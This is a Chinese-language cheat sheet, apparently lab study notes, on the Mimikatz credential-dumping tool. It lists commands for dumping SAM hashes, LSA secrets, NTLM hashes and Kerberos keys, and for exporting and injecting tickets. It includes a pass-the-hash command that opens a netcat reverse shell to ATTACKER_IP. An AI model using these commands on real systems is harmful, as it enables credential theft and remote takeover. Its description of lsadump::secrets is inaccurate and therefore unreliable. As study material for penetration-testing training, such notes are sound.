mimikatz

mimikatz

来源：https://github.com/gentilkiwi/mimikatz

Mimikatz 是由法国人 Benjamin Delpy 编写的 Windows 密码提取工具，被评为黑客们使用最多的五个工具之一，同时它也是 Windows 中收集凭证信息最好的工具，被称为 Windows 凭证收集领域的瑞士军刀。

wiki：https://github.com/gentilkiwi/mimikatz/wiki

工具原理

Mimikatz 的主要原理是在 Windows 系统中用户登录后系统会将身份凭证存储于lsass.exe进程的内存当中，Mimikatz 通过注入lsass.exe进程读取进程内存，从中获取对应的明文密码。

常见用法

从本地 SAM 中提取 NTLM 哈希

privilege::debug
token::elevate

lsadump::sam
这种方法只允许你从机器上的本地用户获得哈希值。没有域名用户的哈希值可用。

使用命令可查看全部功能的模块

::

调试进程修改运行权限为SYSTEM

请求进程debug特权mimikatz
privilege::debug

privilege:: # 查看privilege的运行模块

token

token::whoami
token::list
token::elevate # 提升
token::revert  # 恢复

lsadump

sam
此命令转储安全帐户管理器 ( SAM) 数据库。它包含用户密码的 NTLM，有时还包含 LM 哈希。它可以在两种模式下工作：在线（使用SYSTEM用户或令牌）或离线（使用SYSTEM& SAMhives 或备份）

lsadump::sam
此方法将只允许您从机器上的本地用户那里获取哈希值。没有域用户的哈希值可用。

lsadump::secrets是一个Windows系统安全工具中的命令，用于从SAM数据库中提取密码散列值或明文密码。
具体来说，SAM数据库是Windows系统中存储本地用户账户信息和密码散列值的文件。lsadump::secrets命令可以通过读取SAM数据库文件并解密其中的密码散列值来获取本地用户账户的密码，且在一些特定情况下也能提取出明文密码。

sekurlsa

sekurlsa::msv
此方法将允许您为本地用户和最近登录计算机的任何域用户提取任何 NTLM 哈希。

pth 哈希传递

参数：
/user- 您要模拟的用户名，请记住 Administrator 不是此知名帐户的唯一名称。
/domain- 完全合格的域名 - 没有域或在本地用户/管理员的情况下，使用计算机或服务器名称，workgroup或其他。
/rc4或者/ntlm-可选- 用户密码的 RC4 密钥/NTLM 哈希。
/aes128-可选- 从用户密码和域领域派生的 AES128 密钥。
/aes256-可选- 从用户密码和域领域派生的 AES256 密钥。
/run-可选- 要运行的命令行 - 默认是：cmd拥有一个 shell。

sekurlsa::pth /user:bob.jenkins /domain:za.tryhackme.com /ntlm:6b4a57f67805a663c818106dc0648484 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5555"

列出并导出所有会话的 Kerberos 票证
/export-可选- 票据以文件形式导出.kirbi。它们以用户LUID和组号（0= TGS、1= client ticket(?) 和2= TGT）开头
sekurlsa::tickets /export

通过以下命令使用 mimikatz 从内存中获取 Kerberos 加密密钥
sekurlsa::ekeys

kerberos

TGT在当前会话 (或)中注入一个或多个 Kerberos 票证TGS。

kerberos::ptt [0;427fcd5]-2-0-40e10000-Administrator@krbtgt-ZA.TRYHACKME.COM.kirbi